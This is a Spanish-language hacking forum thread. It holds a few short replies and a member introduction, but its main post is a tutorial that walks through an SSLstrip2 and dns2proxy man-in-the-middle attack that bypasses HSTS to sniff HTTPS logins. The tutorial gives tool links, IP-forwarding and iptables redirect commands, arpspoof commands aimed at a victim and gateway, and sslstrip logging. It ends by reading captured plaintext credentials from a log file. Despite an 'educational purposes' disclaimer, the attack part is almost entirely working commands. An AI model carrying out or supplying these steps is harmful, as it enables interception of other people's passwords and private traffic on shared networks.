aun sigue up sslstrip2..
les recomiendo esta herramienta que hace el ataque mas estable
se llama MITMF


desde kali solo ponen apt-get install mitmf

saludos

Archivo dañado 

Pues los black hat hackers son los que están mas interesados en las estafas, o secuestrar servidores etc...  con el fin de Conseguir más dinero y aparentemente pudieran Ganar más dinero.

Pero un white hat siempre tiene la posibilidad de conseguir empleo en una empresa o ser muy reconocido y Por lo mismo contratado para hacer auditorias en empresas, Otros Utilizan sus conocimientos para impartir cursos a gente que quiere adentrarse en este mundo etc

a nivel general es imposible de contestar esa pregunta por que quizás halla black hat hackers que ganen poco y white hat hackers que ganen un dineral, Lo contrario igual es cierto.

Entonces más bien depende de cada quien y la manera en que emplees tus habilidades.

cierto .. un pequeño error de redacción  : antes de nat no lleva "-"

quedaría así: iptables --flush -t nat

Gracias a todos.. ya me siento como en casa jaja.. he encontrado algo que en muchos foros no hay.
Hoy en día hay muchas comunidades demasiado elitistas. con gente muy orgullosa y que solo le importa darse a conocer en lugar de ayudar.. veo que aquí es totalmente diferente. Tienen buen nivel y son gente sencilla dispuesta ayudar.

Estoy pensando en hacer underc0de mi casa jaja solo voy por mi almohada y cobija xD

saludos a todos

Gracias Gracias 

saludos.. soy denx0 Y al igual que ustedes soy un apasionado en la seguridad informática.
llevo en este mundo un poco mas de 10 años, pasé por este foro y me encantó.
Trataré de aportar  seguido.

Bueno eso es todo.. una vez mas saludos y buen Día 

Había una vez, hace no mucho tiempo. Un mundo en el que la información transmitida por Internet viajaba en texto plano, Por lo cual  cualquier sniffer como cain, ettercap, etc podían Fácilmente  interceptar tu información, obtener tus contraseñas de facebook, hotmail, gmail y espiarte a diestra y siniestra.

Para mitigar este gran problema de seguridad decidieron implementar un protocolo mucho mas seguro llamado HTTPS que lo que hace es cifrar la información en SSL. En poco tiempo muchas paginas importantes como entidades bancarias, Paginas de servicios, gmail, hotmail, facebook, etc,  Migraron a este protocolo.

Por un tiempo todo funcionó a la perfección. nadie podía sniffear los datos de las paginas cifradas en HTTPS. pero eso cambió en 2009 cuando en una conferencia llamada Black Hat se presentó una herramienta bastante curiosa llamada SSLSTRIP... ¿Que hace esta Herramienta?.
Lo que hace es que reemplaza todas las peticiones HTTPS A HTTP y luego hace MITM entre el cliente y servidor, permitiendo al atacante abolir el protocolo HTTPS y hacer que los datos viajen en texto plano.

Por años se podían sniffear los datos de las paginas aun en HTTPS, por eso es que después 
se implementó un nuevo mecanismo de política de seguridad llamado HSTS que lo que hace es que informa al navegador que las conexiones siempre se deben dar bajo SSL/TLS, esta medida de seguridad fue implementada en muchas paginas web pero no solo eso, con el paso del tiempo los navegadores CHROME y FIREFOX incluyeron esta política en sus navegadores  por lo que la herramienta SSLSTRIP dejó de ser efectiva para estos navegadores, Solo seguía  funcionando en Internet explorer.

Pero hace unos meses LeonardoNve lanzó una versión modificada de SSLSTRIP a la cual llamó "SSLSTRIP2" . Esta nueva versión permite evadir las normas de seguridad HSTS y con la ayuda de otra herramienta llamada dns2proxy Permite hacer lo que hasta hoy era imposible: Sniffear conexiones en navegadores como FIREFOX y CHROME.

A continuación te muestro como llevar a cabo esta técnica no sin antes recordarte que esto es con fines Educativos.

Lo primero que necesitaras serán las 2 herramientas antes mencionadas sslstrip2 y dns2proxy
las 2 las puedes descargar directamente desde aquí:

sslstrip2

 https://github.com/byt3bl33d3r/sslstrip2

dns2proxy

 https://github.com/LeonardoNve/dns2proxy

una vez descomprimidas puedes escoger entre Instalar sslstrip2 o Ejecutarla directamente

Para instalarlo solo basta ejecutar el archivo No tienes permitido ver enlaces. Registrate o Entra a tu cuenta de la siguiente manera:

 python setup.py install

si tenías una versión anterior la remplazará.

Ahora si comencemos el Ataque:

Primero necesitamos activar el ip forward con el siguiente comando:

echo "1" > /proc/sys/net/ipv4/ip_forward

agregamos estas reglas de iptables:

iptables --flush

iptables --flush -t nat 

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000

iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53

Iniciamos arpspoof

arpspoof -i eth0 -t IP-VICTIMA IP-GATEWAY

arpspoof -i eth0 -t GATEWAY IP-VICTIMA

Una vez hecho eso solo es cuestión de iniciar sslstrip

sslstrip -l 9000 -a -w log.txt

y por ultimo para que funcione el ataque debemos de correr dns2proxy que crea un falso servidor DNS e interactua con iptables para reenviar las conecciónes:

python dns2proxy

listo .. con esto toda la información del objetivo llegará a nosotros en texto plano.

solo queda abrir el archivo log.txt que generó sslstrip y ahí estará toda la información.

Aquí les dejo un vídeo del proceso.
saludos y Happy hacking